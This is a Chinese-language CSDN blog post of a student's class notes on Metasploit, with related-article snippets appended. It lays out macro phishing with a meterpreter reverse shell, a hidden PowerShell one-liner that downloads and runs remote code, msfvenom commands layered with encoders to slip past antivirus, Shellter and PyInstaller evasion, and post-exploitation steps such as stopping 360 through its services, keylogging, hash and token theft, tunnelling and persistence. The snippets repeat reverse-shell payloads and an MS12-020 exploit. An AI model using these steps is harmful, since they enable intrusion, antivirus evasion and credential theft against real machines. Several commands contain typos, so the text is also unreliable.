MSF day12

已于 2023-12-08 12:15:20 修改
阅读量49 收藏
点赞数
文章标签: web安全
于 2023-12-08 12:15:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hellodaoyan/article/details/134829026
版权

复习昨天的内容 毕竟我没有认真听

msf宏钓鱼

1.先进msf控制台:msfconsle  clear

2.search web_delivery

3.use 1         options

4.show targets

5.set target 2

6.options

7.set payload windows/x64/meterpreter/reverse_tcp

9.set lhost kali     回车ip set lport 1121   回车     run

10.用生成好的命令交给被攻击的cmd 或者powershell

11.结束后老大的补充

长度或者其他不明情况不能正常运行run出来的代码

就使用下面这张图的命令运行

poweshell -w hidden -nop IEX (New Obeject Net WebClient) DownloadString ("")run里面的网址

这个网址其实是一个exe下载的网址

ps:windows CMD 的清屏命令cls

补充的防护问题:

shell.exe

个人租的阿里云的服务器vps可以使用这个方法

安全狗也行 

360不行 360需要老大教的其他方法

今天的正式讲课 免杀

5.0基本废了

一般用最新的 5.020年就废了

360 火绒可能还能过        win10 自带防火墙 最难

所以老大不讲了因为作用基本不大了

要用的话看看下图就行

老师的示例:

这张图过后使用options

然后

然后run

然后show evasion

捆绑免杀

shellter免杀

官网免费版下好后启动之后这样操作:

好了之后如下图:

L回车

1

输入ip 和 端口 实战使用 公网ip

然后msf开启侦听 如下图

 

然后老大开始实战 发现360没发现

但是创建新用户360发现了

另一种免杀利用python 在编码免杀失效和这个一起使用

老大这样写的不知道为什么    

第一张图这样写 似乎是反复增强免杀效果 反复编码

msfvenon -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=1121 -b "x00" -e  x86shikata_ga_na -i 20 | msfvenom -a x86 --platform windows  -e x86/alpha_upper -i 10 -f exe -o shell2.exe

第二个这样写

 msfvenon -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=1121 -b "x00" -e  x86shikata_ga_na -i 10 -f py -o msf.py

然后生成好的msf.py

,模板覆盖到如下图所示文件当中

之后将文件复制到如图的地方

pythoninstaller  msf.py

这个步骤是将 刚刚准备好的模板 弄成 cmd识别出来的命令

然后安杀毒软件实验免杀效果 老大说很玄学 有的杀毒过不了  有的杀毒可能就过得了

gihub的免杀方法

ps:-help列出来的模块不一定全能用 一是因为你的权限 二是你连接的操作系统

MSF后渗透模块深入

第一个自动迁移最好不要用 最好手动迁移 不然可能会降权

关杀软进程很难 一般我们用服务关360

!!!停止服务后需要重启 重启对方电脑之前需要权限维持!!

后渗透模块基本命令操作

run post/ 看有哪些提取信息的功能可以百度

然后后面可以跟给你列v出来的功能 run post/........

可以upload上传提权文件

注意 用linux斜杠/    windows斜杠要\\很麻烦

run VNC怎么修改只读 而是能移动桌面

102行添加 如下图

老大改的有点问题 以后我要用自己找找方法吧

其它基本命令参数

run getgui -e 失败怎么办?

先查看权限   getuid

然后开始提权

search suggest  看提权模块

会帮你把这个电脑缺的漏洞全都给你列举出来

然后如下操作

use3 

 set session 1

run

然后如下操作

然后再次 set session 1

show targets

然后能查找所有文件 我们就要开始寻找这些文件

除了提权另一种方法开启3389端口 cmd命令

摄像头命令

端口转发

内网开了3389  我们在外面该怎么办

建立隧道

然后如下图 然后 yes 就可以远程桌面了

外网远程连接桌面 开隧道

物理机直接通过kali kaili通过隧道 隧道 到 win7

物理机打开远程桌面 连接kali的1138端口 看到的不是 kali界面 而是被黑入的win7界面

另一个例子

现在

和win7处于同一个内网的80.128的服务器 开了80端口 ip地址是80.128现在我们该黑这个电脑

1.通过后渗透模块 将80.128的80 端口转发在我们kali的81上 

这样 访问我们的81 就相当于访问80.128

又或者 它开了一个445的端口 我们用nmap扫描 发现这个端口有ms17-010漏洞

然后可以端口转发到我们本地 我们打我们自己相当于打他

补充 :只要win7能访问到 内网的一些服务器的端口就可以使用端口转发

shell网络环境 分析被黑电脑有没有其他网络 然后访问其他内网

小ps 

不需要

键盘记录

Hash获取

提示用另一个 这是针对32位的 如下

下图权限不够提示

2012以上不能读明文

抓包嗅探

盗取令牌 盗取用户身份 提权

安装后门持久控制服务器 建议CS 我不经常用 这个就是权限维持

权限维持推荐方法:

上面3个绕过检测  的方法也有 以后讲  用CS

hellodaoyan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
msf生成linux shellcode,使用MSF打造各种ShellCode
weixin_39866419的博客
05-13 909
生成各种后门Windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -opayload.exeLinux:msfvenom -a x86 --pla...
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
day11 MSF(一)
hellodaoyan的博客
12-06 45
payload 成品shellcode 半成品 需要服务器环境配好-f exe-e编码变型起到免杀的作用-a 指定位数 x86 32位 x86_64 位 不指都是32位 以后说怎么指定什么位-platform 是指定linux , windows-b也是干扰杀毒软件-i 指定几次 多了可能就坏了-c 注入到一个文件剩下的自己看图。
0day 安全msf 初探
qq_41071646的博客
08-14 204
msf 这个工具 在我还没有开始学pwn 就有搞web的人 说过这个框架 只是没有怎么了解 没有想到这个工具 竟然使用Ruby 写的,, 社会 社会,。 然后这里 关于在 windows下的安装 我就不说了 反正 都一样(直接用kail的就行) 不过 有一点 感觉很坑 就是 版本不一样 然后 导致我们写的 exploit 可能会加载失败,,(可能是) 这里我也不太确定,因为我也不太...
windows及centos安装MSF(Metasploit)
siu~
08-22 2244
windows及centos安装MSF
kali 渗透msf
11-14
kali渗透测试利器
msf开发者文档
09-28
此为msf开发文档,项移植应用msf可以阅读。msf采用ruby编写。
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
网络安全自学从入门到精通的制胜攻略!!!
2301_77160226的博客
07-27 248
在信息时代,网络安全已成为至关重要的领域。越来越多的人希望通过自学掌握这门技术,开启充满挑战与机遇的职业道路。
OWASP ZAP:一款功能强大的开源Web安全扫描工具
Coder加油站的专栏
07-27 837
OWASP ZAP是一个功能强大的Web应用程序安全扫描工具,适用于各种开发、测试和生产环境。通过自动扫描、手动测试、被动扫描和主动扫描等多种功能,ZAP能够帮助用户全面评估Web应用程序的安全性。此外,ZAP还提供了强大的API、插件和扩展功能,可以与CI/CD流水线集成,自动化地进行安全测试
网络安全相关竞赛比赛
黑战士的博客
07-18 1288
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
qt练习控件label控件-lineEdit控件样例代码
07-30
qt练习控件label控件-lineEdit控件样例代码
【JCR一区级】麻雀搜索算法SSA-CNN-LSTM-Attention故障诊断分类预测【含源码 5689期】.zip
07-30
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法-CNN-LSTM-Attention分类系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO-CNN-LSTM-Attention分类 4.4.2 粒子群算法PSO/蛙跳算法SFLA-CNN-LSTM-Attention分类 4.4.3 灰狼算法GWO/狼群算法WPA-CNN-LSTM-Attention分类 4.4.4 鲸鱼算法WOA/麻雀算法SSA-CNN-LSTM-Attention分类 4.4.5 萤火虫算法FA/差分算法DE-CNN-LSTM-Attention分类
详解MATLAB Simulink通信系统建模与仿真
07-30
第1 章 MATLAB 基础与通信系统仿真 1.1 MATLAB 简介 1.2 MATLAB 程序设计 1.3 通信系统仿真 第2 章 Simulink 仿真基础 2.1 Simulink 简介 2.2 Simulink 工作环境 2.3 Simulink 仿真的基本方法 2.4 创建自己的模块库 2.5 S-函数的编写 第3 章 通信信号与系统分析 3.1 离散信号和系统 3.2 Fourier 分析 3.3 带通信号的低通等效 3.4 随机信号分析 第4 章 信道 4.1 加性高斯白噪声信道 4.2 多径衰落信道 第5 章 模拟调制 5.1 幅度调制 5.2 角度调制 第6 章 数字基带传输 6.1 概述 6.2 二进制基带信号传输 6.3 基带PAM 信号传输 6.4 带限信道的信号传输 第7 章 数字信号载波传输 7.1 概述 7.2 载波幅度调制(PAM) 7.3 载波相位调制(PSK) 7.4 正交幅度调制(QAM) 7.5 载波频率调制(FSK) 第8 章 信道编码和交织 8.1 概述 8.2 线性分组码
SCI一区】淘金算法GRO-CNN-BiLSTM-Mutilhead-Attention多变量时序预测含源码 5642.zip
07-30
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法-CNN-BiLSTM-Mutilhead-Attention回归预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.2 粒子群算法PSO/蛙跳算法SFLA-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.3 灰狼算法GWO/狼群算法WPA-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.4 鲸鱼算法WOA/麻雀算法SSA-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.5 萤火虫算法FA/差分算法DE-CNN-BiLSTM-Mutilhead-Attention回归预测
2020年首届“洪泽湖杯”中国人工智能掼蛋算法大赛第8名我就是掼蛋.zip
07-30
毕业设计是高等教育阶段学生完成学业的一个重要环节,通常在学士或硕士学业即将结束时进行。这是学生将在整个学业中所学知识和技能应用到实际问题上的机会,旨在检验学生是否能够独立思考、解决问题,并展示其专业能力的一项综合性任务。 毕业设计的主要特点包括: 独立性: 毕业设计要求学生具备独立思考和解决问题的能力。学生需要选择一个合适的课题,研究相关文献,进行实地调查或实验,并提出独立见解。 实践性: 毕业设计是将理论知识应用到实际问题中的一次实践。通过完成毕业设计,学生能够将所学的专业知识转化为实际的解决方案,加深对专业领域的理解。 综合性: 毕业设计往往要求学生运用多个学科的知识,综合各种技能。这有助于培养学生的综合素养,提高他们的综合能力。 导师指导: 学生在毕业设计过程中通常由一名指导老师或导师团队提供指导和支持。导师负责引导学生确定研究方向、制定计划、提供建议,并在整个过程中监督进展。 学术规范: 毕业设计要求学生按照学术规范完成研究,包括文献综述、研究设计、数据采集与分析、结论和讨论等环节。学生需要撰写一篇完整的毕业论文,并进行答辩。
网络音乐搜索引擎,音乐搜索器 - 多站合一音乐搜索,音乐在线试听
最新发布
07-30
网络音乐搜索引擎,音乐搜索器 - 多站合一音乐搜索,音乐在线试听 效果截图https://www.diyiyuanma.cn/3444.html 多站合一音乐搜索解决方案,数据调用的是各网站的API接口, 有的接口并不是开放的,随时可能失效,本项目相关代码仅供参考。 网络音乐搜索引擎,音乐搜索器 - 多站合一音乐搜索,音乐在线试听
msf之ms12-020的复现
05-24
MS12-020是远程桌面协议(RDP)中的一个漏洞,它可以允许攻击者通过发送恶意的RDP数据包来执行远程代码。MSF(Metasploit框架)是一个开源的漏洞利用工具,可以用来测试和利用此漏洞。 以下是利用MS12-020漏洞的步骤: 1. 首先,需要使用Metasploit框架。如果你还没有安装它,请先到官网下载并安装。 2. 打开Metasploit框架控制台,输入以下命令: ``` use auxiliary/scanner/rdp/ms12_020_check ``` 这个命令将会检查目标是否存在MS12-020漏洞。 3. 如果目标存在漏洞,可以使用以下命令进行攻击: ``` use auxiliary/dos/windows/rdp/ms12_020_maxchannelids set RHOSTS <target IP address> exploit ``` 这个命令将会执行一个拒绝服务攻击,导致目标系统崩溃。这个攻击不会导致目标系统被入侵或数据被窃取,但是可以影响系统的可用性。 4. 如果你想要执行更危险的攻击,可以使用以下命令: ``` use exploit/windows/rdp/ms12_020_maxchannelids set RHOSTS <target IP address> set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <attacker IP address> exploit ``` 这个命令将会执行一个远程代码执行攻击,使用Meterpreter反向Shell连接到目标系统。这个攻击可以让攻击者完全控制目标系统,包括执行任意命令、窃取数据等。 需要注意的是,利用漏洞进行攻击是非法的,只能在授权的环境下进行测试。同时,这个漏洞已经被修复,建议尽快更新你的系统以避免被攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值